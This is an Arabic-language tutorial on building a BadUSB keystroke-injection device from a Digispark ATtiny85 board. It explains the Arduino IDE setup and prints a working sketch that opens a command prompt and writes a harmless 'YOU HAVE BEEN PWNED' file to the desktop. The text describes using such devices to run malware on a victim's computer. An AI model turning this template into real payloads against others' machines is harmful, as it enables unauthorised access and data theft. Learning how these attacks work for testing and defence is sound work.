كيفية بناء جهاز Rubber Ducky USB باستخدام Digispark ATtiny85

  كيفية بناء جهاز Rubber Ducky USB باستخدام Digispark ATtiny85

ما هو هجوم BadUSB ؟
BadUSB هو هجوم يستغل ثغرة مكتشفة في برامج . USB بحيث يعيد مثل هذا الهجوم برمجة جهاز USB، مما يجعله يعمل كجهاز human interface device، ويتم استخدام جهاز USB لتنفيذ الأوامر أو تشغيل البرامج الضارة على كمبيوتر الضحية .
USB Rubber Ducky:
وهو جهاز عظيم، حيث لا يتجاوز سعره ال50$، فهو يبدو وكأنه جهاز USB طبيعي ولكن عند توصيله في الكمبيوتر فهو بدلاً من أن يسجل نفسه وكأنه USB سيسجل نفسه وكأنه جهاز كيبورد، وبعدها يبدأ بالكتابة تلقائياً لتشغيل البرامج والأدوات التي قد تكون إما متوفرة على الكمبيوتر الضحية أو يتم تحميلها على Micro SD التي يتم وضعها في هذا الجهاز الصغير، من أجل استخراج المعلومات .
في هذا المشروع، نستخدم لوحة ATtiny85 لصنع Rubber Ducky الخاص بنا.

يمكن برمجة لوحات Digispark باستخدام Arduino IDE. يحتوي ATtiny85 على حوالي 8kB من ذاكرة الفلاش القابلة للبرمجة. يستخدم برنامج bootloader حوالي kB2 وستكون الذاكرة المتوفرة 6kB. إنه صغير جِدًّا مقارنة بلوحة Arduino أو معدات .Rubber Ducky.

لنبدأ على بركة الله

تأكد من تثبيت الإصدار المتوافق على بنية جهازك من . (32 bit or 64 bit)

ملاحظة:إذا كنت تقوم بتوصيل Digispark ATtiny85 لأول مرة، فسيقوم الكمبيوتر باكتشاف الجهاز وانتظر 5 ثوانٍ وفصله. سوف تسمع صوت توصيل / قطع توصيل باستمرار.

هذا الصوت طبيعي ولا يحدث إلا مع جهاز Digispark ATtiny85 غير المبرمج.

تثبيت Arduino IDE

قم بتنزيل وتثبيت أحدث إصدار من Arduino IDE .

خطوات يجب تنفيذها في Arduino IDE

افتح تطبيق Arduino IDE، وانتقل إلى ملف -> التفضيلات

في حقل الإدخال المسمى عناوين URL، أدخل عنوان URL التالي:

ملاحظة : لنسخ الرابط قم بالتحديد اولا ثم اضغط CTRL+C.

http://digistump.com/package_digistump_index.json

انتقل إلى Tools -> Board -> Boards Manager

من القائمة المنسدلة، حدد مساهمة Contributed

حدد حزمة Digistump AVR Boards وقم بتثبيتها.

بمجرد اكتمال هذه الخطوات، قم بإنشاء مسودة جديد وانسخ الكود النصي أدناه في IDE قبل حفظه.

ملاحظة : لنسخ الكود قم بالتحديد اولا ثم اضغط CTRL+C.

#include "DigiKeyboard.h"

void setup() {

}

void loop() {

 DigiKeyboard.sendKeyStroke(0);

 DigiKeyboard.delay(500);

 DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);

 DigiKeyboard.delay(500);

 DigiKeyboard.print("cmd /k cd %UserProfile%/Desktop"); DigiKeyboard.sendKeyStroke(KEY_ENTER);

 DigiKeyboard.delay(500);

 DigiKeyboard.print("echo YOU HAVE BEEN PWNED > YOU_HAVE_BEEN_PWNED.TXT");

 DigiKeyboard.sendKeyStroke(KEY_ENTER);

 DigiKeyboard.delay(500);

 DigiKeyboard.print("exit");

 DigiKeyboard.sendKeyStroke(KEY_ENTER);

 DigiKeyboard.delay(500);

 for (;;) {

 /*empty*/

}

}

أنقر فوق Sketch -> Upload

سيتم التحقق من الكود، ثم سيطلب منك Arduino IDE بتوصيل Digispark USB في غضون 60 ثانية.

بمجرد توصيل Digispark، يقوم Arduino IDE بكتابة الكود إلى ATtiny85 ثم يعرض الرسالة بخط أحمر.

اخلاء مسؤولية! هذا المقال لا يعبر بالضرورة عن رأي SY Tech Trends